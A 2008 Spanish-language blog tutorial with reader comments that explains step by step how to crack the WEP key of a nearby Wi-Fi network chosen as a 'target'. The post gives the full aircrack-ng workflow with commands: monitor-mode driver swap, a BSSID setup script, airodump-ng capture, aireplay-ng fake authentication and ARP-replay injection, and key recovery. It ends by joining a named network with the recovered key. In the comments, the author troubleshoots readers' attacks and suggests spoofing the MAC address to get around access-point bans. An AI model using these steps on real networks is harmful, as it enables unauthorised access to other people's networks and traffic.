Aircrack-ng Tercera parte: El ataque a la red con cifrado wep/wep2
Bajo la suposicion que ya estamos entendidos con terminos de redes inalambricas( wep, bssid, mac, etc…) y que ya conocemos nuestra tarjeta de red y ya esta prepararda para la inyeccion de trafico, vamos a lo realmente divertido, el ataque!.
Nota: La informacion aqui publicada fue creada con fines educativos y de uso personal para algunos amigos que me preguntaron del tema. Es responsabilidad del lector el uso que se le de a esta informacion.
Necesitaremos abrir varias terminales (yo lo hice con 3). En una de ellas montamos el driver de inyeccion para nuestra tarjeta ipw3945 (ojo este unico paso es para lo que tenemos este modelo tu tarjeta, tu tendras que buscar como poner en modo monitor tu tarjeta).
Nos autentificamos como root:
sudo -s
“desmontamos” el driver actual de ipw3945
modprobe -r ipw3945
“montamos” el modulo madwifi previamente descargado:
modprobe ipwraw
Ahora ya tenemos activado el driver, si tecleas el comando iwconfig te daras cuenta de que se creo una nueva interfaz llamada rtap0. Esta interfaz es la que usarmos para capturar los paquetes, y aunque en la descripcion diga algo como “no wireless extension” no hagas caso, es nuestra arma calibrada.
Un detalle importante, la interfaz rtap0 se crea al cargar el ipwraw y solo nos sirve para capturar paquetes aun asi para inyectar y autentificarnos usaremos nuestra interfaz wifi normal en mi caso eth1. Tambien cabe aclarar que no podremos utilizar la interfaz inalambrica mientras este en ipwraw, y no se recomienda usar cableada tampoco.
Despues de cargar el modulo vamos a buscar nuestra red objetivo, para eso lanzamos un sniffing para ver las redes disponibles en nuestro alcanze:
airodump-ng rtap0
Nos saldra una pantalla y en unos segundos se rellenara con los datos de los puntos de acceso de la zona asi como de los equipos que estan conectados a las mismas.
Aqui deberemos buscar nuestro objetivo, una wireless que tenga la suficiente señal y cifrado wep y puesto que vamos a inyectar trafico si hay alguien conectado es irrelevante. Serecomienda escoger la red con mejor señal (PWR) y ya que mejor responda (#Data). Debemos anotar tanto el canal como la mac del punto de acceso porque necesitaremos esos datos en los sucesivos pasos.
Ahora copia y pega en un documento de texto el siguiente script y guardalo dentro tu home (/home/nombre de usuario), con el nombre preparar.sh:
#!/bin/bash
clear
echo “Indica el canal para eth1″
read canal
echo “Indica el rate de captura”
read rate
echo “Indica el bssid objetivo”
read bssid
ifconfig eth1 down
chmod u+wrx /sys/class/net/eth1/device/rate
echo $rate >/sys/class/net/eth1/device/rate
echo $canal >/sys/class/net/eth1/device/channel
echo $bssid >/sys/class/net/eth1/device/bssid
ifconfig eth1 up
echo “Configuracion completada, listo para inyectar”
Despues de guardarlo, abrimos una terminal y le cambiamos los permisos de ejecucion al script
astaroth@astaroth-laptop:~$ sudo chmod 777 preparar.sh
El script es una copia del que viene en la distribucion wifiway. Dicho esto proseguimos, ahora ejecutamos el script, a la primera pregunta debemos poner el canal del punto de acceso, para el rate siempre pondemos 2(esto es importante otro valor hara que no funcione) y a la tercera le pegamos la mac objetivo.
Una vez hechos estos paso ya estamos en condiciones de hacer el ataque en si (ya hay driver, ya sabemos cual es el objetivo, ya preparamos la tarjeta de red hacia el objetivo).
Captura de paquetes
En primer lugar antes de nada vamos a activar el airodump para capturar los paquetes, tecleamos el siguiente comando:
airodump-ng -c CANAL -w FICHERO rtap0
Donde CANAL es el canal de la red destino y FICHERO es el nombre del archivo donde guardaremos los paquetes capturados (este nombre puede cambiar).
Autentificacion
Ahora pasamos a autentificarnos contra el punto de acceso, para ello otro tecleamos otro comando mas:
aireplay-ng -1 0 -e ESSID -a MAC_PUNTODEACCESO -h NUESTRAMAC eth1
Hay varios detalles a mencionar sobre este comando. El 0 indica que se autentifique una sola vez, si lo consigue nos avisa, de todos modos a veces es conveniente usar la opcion 10 para que se autentifique cada 10 segundos, esto puede ser util si por ejemplo estamos inyectando trafico y se para de golpe. La mac del punto de acceso ya la sabemos y la nuestra tambien aun asi podemos usar la nuestra o usar una falsa, eso como veais. Por ultimo eth1 es el nombre de mi interfaz wireless, pero tambien puede ser eth2 o eth3.
Inyeccion
Ahora ya estamos en disposicion de inyectar trafico:
aireplay-ng -3 -b MAC_PUNTODEACCESO -h NUESTRAMAC eth1
Otra vez mas de los mismo, deberemos cambiar los datos por los correspondientes.
Este comando se queda un rato como esperando enviando paquetes, en aproximadamente unos dos minutos deberia comenzar a inyectar(arp requests), momento de pasarnos a la pestaña del airodump y ver como suben los paquetes rapidamente. No hay un cifra de paquetes fija, varia mucho porque tambien depende de la contraseña que tiene el punto de acceso, aun asi la normal general es unos 250.000 para wep de 64 bits y 1.000.000 para la de 128 bits. Si todo va bien en unos 10 minutos tendremos la cantidad necesaria de paquetes para descifrar la contraseña.
Obtencion de la contraseña
Una vez tenemos el numero de paquetes podemos ejecutar el aircrack-ng, no hace falta parar la inyeccion, asi que en caso de que necesite mas paquetes podra seguir inyectando. Para obtener la contraseña tecleamos:
aircrack-ng FICHERO.cap
Esperamos unos 2 minutos y:
Listo, tenemos la contraseña para conectarnos a la red.
Ahora solamente desmontamos el driver madwifi:
sudo -s
modprobe -r ipwraw
“montamos” el modulo ipw3945:
modprobe ipw3945
Lo mas probable es que la muestre en formato hexadecimal (como en este caso), pero simplemente buscáis una tabla de correlaciones hex/ascii y a traducir.
Podemos además conectarnos, o por la clave ya traducida o por iwconfig, ejemplo:
iwconfig eth1 mode managed essid INFINITUM5179 channel 4 key 81:60:30:76:07
dhcpcd eth1
O tambien nos podemos conectar de manera grafica, ubuntu permite el manejo de contraseñas en formato hexadecimal, lo que tal vez si sea necesario hacer en ambas formas es activar dhcpd en la interfaz de red (dhcpd eth1)
Y listo, recuerda que en tu zona este tipo de acciones pueden ser ilegales asi que usalo con precaucion.
April 13th, 2008 at 7:44 am
Hola, tengo unas dudas haber si me las podeis resolver, cuando hago la instruccion
- ¿airodump-ng no para nunca?
- Al no parar la paro yo (Cntrl + C) a continuacion hago la instruccion aireplay-ng de la autentificacion y me dice, despues de la primera linea, read failed: Network is down ¿a que se debe?
Gracias.
April 13th, 2008 at 6:51 pm
airodump-ng no lo debes parar en ninguna parte del proceso, ya que es la captura de trafico de la red, el debe estar corriendo durante toda la auditorio wireless
April 14th, 2008 at 1:19 am
¿Pero no debo parar ninguno de los dos airodump-ng que se hacen?
April 14th, 2008 at 10:24 am
simple, al hacer:
airodump-ng rtap0
Lo que estas haciendo es monitorear a ver cual red es la que quieres auditar, una vez que tengas el bssid, essid y canal de la red que quieres puedes parar este comando, y
cuando haces:
airodump-ng -c CANAL -w FICHERO rtap0
Estas capturando todos los paqutes posibles de la red que hayas elegido (y nada mas de esa) este comando estara monitoreando asi que NO LO PARES DURANTE TODA LA AUDITORIA DE RED.
April 15th, 2008 at 8:52 am
Hola este es el problema que me da:
root@giorgiop:~# aireplay-ng -1 0 -e WLAN_3E -a 00:02:CF:75:FF:B5 -h 00:1B:77:2F:AE:74 eth1
The interface MAC (00:1C:BF:24:F0:F5) doesn’t match the specified MAC (-h).
ifconfig eth1 hw ether 00:1B:77:2F:AE:74
12:32:54 Waiting for beacon frame (BSSID: 00:02:CF:75:FF:B5)
read failed: Network is down
¿sabes por que me sale?
Gracias
April 15th, 2008 at 9:54 am
Checa antes que nada si eth1 corresponde a tu interfaz inalambrica con iwconfig, despues con ifconfig ethx (sustituyendo x por la interfaz: eth0, eth1, eth2…) sacaras la mac address real de tu interfaz, necesaria para la inyeccion
astaroth@astaroth-laptop:~$ ifconfig eth1
eth1 Link encap:Ethernet direcciónHW 00:1B:77:2F:AE:74 <—esa mac address (a tuya, no la mia) es la que usaras en el aireplay-ng
May 14th, 2008 at 1:05 am
Hola, he seguido los pasos de la segunda parte, pero cuando hago:
modprobe -r ipw3945
Me pone:
WARNING: /etc/modprobe.d/ipwraw line 1: ignoring bad line starting with ‘“blacklist’
WARNING: /etc/modprobe.d/ipwraw line 1: ignoring bad line starting with ‘“blacklist’
y en modprobe ipwraw también.
Que puedo hacer?
May 22nd, 2008 at 10:14 am
Hola, me da un error al intentar la autentificacion es el siguiente:
root@giorgiop:~# aireplay-ng -1 0 -e WLAN_3E -a 00:02:CF:75:FF:B5 -h 00:1C:BF:24:F0:F5 eth1
20:06:19 Waiting for beacon frame (BSSID: 00:02:CF:75:FF:B5)
read failed: Network is down
¿sabrías decirme que debo hacer para solucionarlo?
Gracias por todo.
May 22nd, 2008 at 10:50 pm
Antonio:
al hacer: modprobe -r ipw3945 estas “desmontando” el driver ipw3945 de tu laptop, ahora, si llegaste hasta este paso se supone que en verdad si tienes el driver ipw3945 para la tarjeta wireless intel 3945 abg trabajando? checalo con iwcinfig.
En caso de que el driver este bien, antes de desmontarlo necesitas haberlo parchado con ipwraw, para que el quitar y poner driver no te genere problemas
recuerda poner en el blacklist el modulo ipwraw, para que no se carge al iniciar sesion
May 22nd, 2008 at 10:53 pm
Giorgio:
Hay algunos Access Points que como medida de seguridad niegan permisos de autentificacion a ciertas direcciones mac insistentes, hay otros AP en los que simplemente tienes que ser “insistente” trata esto:
aireplay-ng -1 3 -e WLAN_3E -a 00:02:CF:75:FF:B5 -h 00:1C:BF:24:F0:F5 eth1
Cambiando el 0 por 3 va a hacer un nuevo intento por comectar al AP.
En caso de que sea la primera opcion (baneado por el AP) trata cambiando tu direccion mac con la APP mac changer (sirve tmb para rapidshare
)
May 23rd, 2008 at 12:38 am
¿Me podrias explicar como va lo del mac changer? no lo hice nunca y no se muy bien que hay q hacer para cambiar la MAC(explicamelo si puedes como si fuera para tontos paso a paso XD).
Gracias
June 3rd, 2008 at 6:27 am
gracias por este tuto es perfecto, todo me salio bien…sige asi
saludos
June 3rd, 2008 at 10:10 pm
GIorgio:
LO de mac changer es una aplicacion exclusiva del mundo gnu/linux, como su nombre lo dice, sirve para maquillar la direccion fisica (direccion mac) de nuestro dispositivo de red, esto por razones de seguridad de algunos routers, pero en este no es el caso, el cambiar la mac address es meramente opcional
June 5th, 2008 at 6:26 am
hola he leido tu manual y tengo un error que no he podido solucionar todo va bien solo hasta llegar a esta gran parte:
aireplay-ng -1 0 -e INFINITUM2836 -a 00:21:7C:1D:12:A1 -h 00:1C:BF:96:F8:F5 eth1
y el error que me muestra es el siguiente:
21:08:00 Waiting for beacon frame (BSSID: 00:21:7C:1D:12:A1)
21:08:00 eth1 is on channel 1, but AP uses channel
como puedo cambiarme de canal ejem:3
y cuando me conecto a un AP con canal 1 me da el seguinete error:
21:11:37 Waiting for beacon frame (BSSID: 00:21:7C:1D:12:A1)
21:11:37 No such BSSID available
ojala y me puedas ayudar ya que soy nuevo en esto del hacking
June 5th, 2008 at 7:24 am
Hola
Mira tengo ubuntu 7.10, y sigo tu tutorial al pie de la letra pero cuando lanzo en la consola la instrucción
airodump-ng rtap0
me muestra una pantalla muy parecida a la tuya, pero con la única diferencia de que no encuentra ninguna red WEP (siendo que por lo menos existen 2) y también me fije que se queda en CHANNEL 0. Es normal esto? por qué no busca en los demás canales?, Tengo el mismos hardware que tu (tarjeta ipw3945)
Que tengo que hacer, de ante mano GRACIAS.
June 8th, 2008 at 1:18 pm
Hola,
cambie lo que me dijiste y me sigue saliendo el error:
root@giorgiop:~# aireplay-ng -1 3 -e WLAN_3E -a 00:02:CF:75:FF:B5 -h 00:1C:BF:24:F0:F5 eth1
20:06:19 Waiting for beacon frame (BSSID: 00:02:CF:75:FF:B5)
read failed: Network is down
¿Sabes que puedo estar haciendo mal?
Gracias.
June 8th, 2008 at 3:24 pm
giorgio:
Nada malo en realidad, digamos que el AP se hace “la dificil” asi que hay que tener un poco de insistencia, si llegas hasta ese punto sin llegar a ningun fatal error vas bien que tal esto?:
aireplay-ng -1 10 -e WLAN_3E -a 00:02:CF:75:FF:B5 -h 00:1C:BF:24:F0:F5 eth1
haciendo qu el rate de insistencia sea 10 veces en lugar de 3
June 21st, 2008 at 3:49 am
hola buenas tengo el mismo error que antonio modprobe -r ipw3945
Me pone:
WARNING: /etc/modprobe.d/ipwraw line 1: ignoring bad line starting with ‘“blacklist’
WARNING: /etc/modprobe.d/ipwraw line 1: ignoring bad line starting with ‘“blacklist’
y en modprobe ipwraw también.
Que puedo hacer?
como no veo que nadie lo ha aclarado lo vuelvo a preguntar si sigo con el proceso cuando llego a este punto
aireplay-ng -1 0 -e ESSID -a MAC_PUNTODEACCESO -h NUESTRAMAC eth1
me pone asociate unsucesful y no me deja inyectar haber si alguien por favor me puede exar una mano gracias
September 10th, 2008 at 11:53 am
Ola tengo este error :
sudo aireplay-ng -1 0 -e WLAN_65 -a 00:16:38:88:E8:78 -h 00:1B:77:95:EB:23 wifi0
21:29:57 Waiting for beacon frame (BSSID: 00:16:38:88:E8:78) on channel 1
21:30:14 No such BSSID available.
y ni poniendo 10 en vez de 1
sudo aireplay-ng -1 10 -e WLAN_65 -a 00:16:38:88:E8:78 -h 00:1B:77:95:EB:23 wifi0
21:31:41 Waiting for beacon frame (BSSID: 00:16:38:88:E8:78) on channel 1
21:32:00 No such BSSID available.
serviria decir que la red esta en el canal 12.
Y otra cosilla cuando hago “airodump-ng rtap0 ” me sale
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
BSSID STATION PWR Rate Lost Packets Probes
(not associated) 00:11:50:C3:3F:48 194 0- 1 20 486 WLAN_65
(not associated) 00:19:D2:D3:B8:4A 172 0- 1 0 22 CASA2
y no me sale ningunaa en medio ni cambiando de canal ni nada, aun sabiendo que deberian salir dos porque las cojo con windows
Gracias de antemano
September 10th, 2008 at 12:30 pm
hola
pero ase muy poco intente denuevo pero el problema es que para que airodum-ng obtenga paquetes mas rapido hay que autentificarse pero no pude……. no cacho que pudo haber pasado?
tengo un problema medio raro
la primera ves que intente obtener el cifrado wep de una red tube un problema de que se me acabo la memoria ram y quede hay ( wifislax 3.1 cd live) vi el video de youtube y con eso intente obtener la clave
el hecho que a la primera ves no pude
el hecho que he buscado en internet y sale que tengo que bajar la frecuencia de la targeta…… pero hay tengo el problema…. como se hace eso?
tengo una targeta d-link dwa510 con chip ralink rt61
al ejecutar airodump-ng (tengo una red con permiso para obtener la clave) tengo un power de 210 esto influye en mi problema ya que la primera ves solo tenia -1 en power
gracias
October 29th, 2008 at 5:47 pm
Hola.
Sirve este mismo proceso para descifrar claves wpa ??? donde podría encontrar info
Gracias…
October 30th, 2008 at 12:02 am
Pues si y no:
Si se puede descifrar una clave WPA/WPA2 con aircrack, pero no con lo dicho en este tutorial.
Para lograr un ataque en wpa se que se necesita un equipo conectado (para lograr capturar un handshake) y descifrarlo con un diccionario de datos, algo mas dificil y menos probable de lograr, pero no imposible.
Buena idea, a ver si la siguiente semana logro un tutorial sobre el infame WPA
August 18th, 2009 at 7:00 am
Hola a todo el mundo, tengo una duda…cuando inyectamos a mi se me queda la ventana con el mensage: waiting for beacon frame (BSSID _________) y no asocia… se queda ahí, por que puede ser?? Gracias de antemano!
November 18th, 2009 at 1:54 pm
Buenas.
Gracias por el manual.
En el comando de autenticación, probando con 0 me hace successfull pero si pongo el 10 al cabo de unas cuantas autenticaciones correctas me da error Attack was unccessful…
Respecto al comando de inyección me pone:
Read XXXX packets pero no obtendo nunca un ARP.
¿A qué se puede deber?
Gracias de antemano.